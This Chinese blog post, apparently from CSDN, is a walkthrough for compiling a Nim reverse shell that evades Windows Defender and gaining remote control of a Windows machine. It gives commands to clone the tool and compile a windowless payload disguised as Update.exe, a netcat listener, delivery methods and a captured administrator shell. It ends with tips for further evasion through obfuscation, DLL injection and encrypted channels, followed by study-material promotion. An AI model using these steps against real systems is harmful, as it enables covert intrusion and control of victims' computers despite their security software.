零检出反弹Shell!一个冷门语言完美绕过Windows Defender

零检出反弹Shell!一个冷门语言完美绕过Windows Defender

*引言*

在网络安全和渗透测试领域,Windows Defender 是 Windows 10 及以上版本默认启用的防御工具,能够有效检测和拦截各种恶意软件。然而,对于安全研究人员和红队测试人员来说,如何绕过 Windows Defender 并成功获取反向 Shell(Reverse Shell),是一个值得研究的重要课题。

Linux 反弹 Shell 小结 | Paoka1's Blog

本文将介绍如何使用 Nim 语言编写的反向 Shell,并将其编译为 Windows 可执行文件(.exe),从而在 Kali Linux 主机上成功捕获 Shell,并避开 Windows Defender 的检测。


*Nim 介绍与环境搭建*

Nim 是一门相对较新的编程语言,具有高性能、可读性强、跨平台编译等特点。由于 Windows Defender 主要针对 C、Python、PowerShell 等常见语言的恶意 Payload 进行特征检测,因此使用 Nim 编写的 Shell 具有更高的隐匿性,不容易被 Windows Defender 识别。

本次使用的是 GitHub 上的 Nim-Reverse-Shell 项目,该项目由 Sn1r 开发,提供了一种简单但隐蔽的反向 Shell,能够有效绕过 Windows Defender。

*1. 下载 Nim-Reverse-Shell*

首先,在 Kali Linux 终端中执行以下命令,克隆 Nim 反向 Shell 的 GitHub 仓库:

git clone https://github.com/Sn1r/Nim-Reverse-Shell.git
cd Nim-Reverse-Shell


*安装 Nim 编译器*

由于 Nim 代码需要编译为 Windows 可执行文件,因此需要先安装 Nim 编译器。

*2. 安装 Nim*

首先,下载 Nim 安装包:

wget https://github.com/dom96/choosenim/releases/download/v0.8.4/choosenim-0.8.4_linux_amd64

然后,执行以下命令安装 Nim:

chmod +x choosenim-0.8.4_linux_amd64
./choosenim-0.8.4_linux_amd64

安装完成后,运行以下命令更新 Nim 到稳定版本:

nim update stable

默认情况下,Nim 可执行文件会被存储在以下目录:

/home/用户名/.nimble/bin

可以使用 echo $PATH 命令查看 Nim 是否已成功安装。


*编译 Nim 反向 Shell*

*3. 生成可执行文件(Payload)*

在成功安装 Nim 后,可以使用以下命令将 Nim 代码编译为 Windows 可执行文件(.exe):

nim c -d:mingw --app:gui --opt:speed -o:Update.exe ../../Desktop/rev.nim

命令解析:

  • c:编译 Nim 代码
  • -d:mingw:使用 MinGW 进行 Windows 平台编译
  • --app:gui:指定生成 GUI 应用程序,防止命令行窗口弹出
  • --opt:speed:优化编译,提升可执行文件的运行速度
  • -o:Update.exe:输出文件命名为 Update.exe
  • ../../Desktop/rev.nim:指定 Nim 代码的路径

编译成功后,Update.exe 文件将被生成。


*设置 Netcat 监听器*

*4. 启动 Netcat 监听端口*

在 Kali Linux 上,使用 Netcat 监听即将连接的反向 Shell。在终端中执行以下命令:

nc -lvnp 4444

命令解析:

  • -l:监听模式
  • -v:详细模式,显示连接状态
  • -n:不解析 DNS
  • -p:指定监听端口,这里使用 4444

*在 Windows 目标机上运行 Payload*

*5. 传输可执行文件到 Windows 目标机*

Update.exe 文件传输到目标 Windows 计算机,可以使用:

  • USB 设备
  • 共享文件夹
  • 远程桌面传输
  • HTTP 服务器下载(例如 python3 -m http.server
*6. 运行 Payload,获得反向 Shell*

在 Windows 目标机上运行 Update.exe,此时 Windows Defender 不会报毒,并且该程序不会弹出窗口,而是悄无声息地运行在后台

如果一切配置正确,在 Kali Linux 上的 Netcat 监听窗口中,将看到一个新的 Shell 连接:

Connection received on 192.168.1.100:4444
Microsoft Windows [Version 10.0.19044.1288]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Administrator\Desktop>

此时,已经成功获取了 Windows 目标机的 Shell 权限。


*绕过 Windows Defender 的关键点*

  1. Nim 语言的特性:由于 Nim 代码不像 Python、PowerShell 那样常见,因此 Windows Defender 对其检测力度较低。
  2. GUI 应用模式:编译时使用 --app:gui 选项,使得程序在 Windows 目标机上运行时不会弹出终端窗口,从而降低被用户发现的风险。
  3. 自定义 Payload 名称:使用类似 Update.exe 这样的系统常见文件名,避免被安全软件或用户怀疑。
  4. Payload 传输方式:避免通过邮件或公开网络下载,减少被 Windows Defender 云端分析的风险。

*如何进一步提升隐匿性?*

为了进一步避免 Windows Defender 检测,可以采取以下措施:

  1. 使用代码混淆:通过代码混淆工具,使 Payload 代码难以被静态分析。
  2. 自定义 Nim 代码:修改 GitHub 上的 Nim-Reverse-Shell,让其生成的 Shell 具有独特签名,避免被特征匹配检测。
  3. 使用加密通信:结合 msfvenom + Nim,使用 HTTPS 反向 Shell,防止被流量监控检测。
  4. 利用 DLL 注入:将 Shell 代码注入到合法进程中,使其运行在受信任的 Windows 进程内。

*总结*

本文介绍了如何在 Kali Linux 上使用 Nim 语言 编写一个 反向 Shell,并通过 编译为 Windows 可执行文件 的方式绕过 Windows Defender,实现 Windows 目标机的远程控制。

*完整流程回顾:*
  • 下载 Nim-Reverse-Shell 项目
  • 安装 Nim 编译器
  • 编译 Payload(Update.exe)
  • 在 Kali 启动 Netcat 监听器
  • 将 Payload 传输到 Windows 目标机并执行
  • 成功捕获 Windows 反向 Shell

*安全声明*

本教程仅供网络安全研究和授权测试使用,切勿将此技术用于非法目的。未经授权的渗透测试和入侵行为属于违法行为,后果自负。

希望本文能帮助网络安全爱好者深入了解攻击与防御的原理,同时提醒大家加强安全防护,避免类似攻击手法对自身系统造成威胁。

关于网络安全技术储备

网络安全是当今信息时代中非常重要的一环。无论是找工作还是感兴趣(黑客),都是未来职业选择中上上之选,为了保护自己的网络安全,学习网络安全知识是必不可少的。

如果你是准备学习网络安全(黑客)或者正在学习,下面这些你应该能用得上:

①网络安全学习路线
②20份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥网络安全必备书籍
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析

一、网络安全(黑客)学习路线

网络安全(黑客)学习路线,形成网络安全领域所有的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。

在这里插入图片描述

二、网络安全教程视频

我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。

三、网络安全CTF实战案例

光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这里带来的是CTF&SRC资料&HW资料,毕竟实战是检验真理的唯一标准嘛~

img

四、网络安全面试题

最后,我们所有的作为都是为就业服务的,所以关键的临门一脚就是咱们的面试题内容,所以面试题板块是咱们不可或缺的部分,这里我给大家准备的就是我在面试期间准备的资料。

在这里插入图片描述

网安其实不难,难的是坚持和相信自己,我的经验是既然已经选定网安你就要相信它,相信它能成为你日后进阶的高效渠道,这样自己才会更有信念去学习,才能在碰到困难的时候坚持下去。

机会属于有准备的人,这是一个实力的时代。人和人之间的差距不在于智商,而在于如何利用业余时间,只要你想学习,什么时候开始都不晚,不要担心这担心那,你只需努力,剩下的交给时间!

这份完整版的网络安全学习资料已经上传CSDN,朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值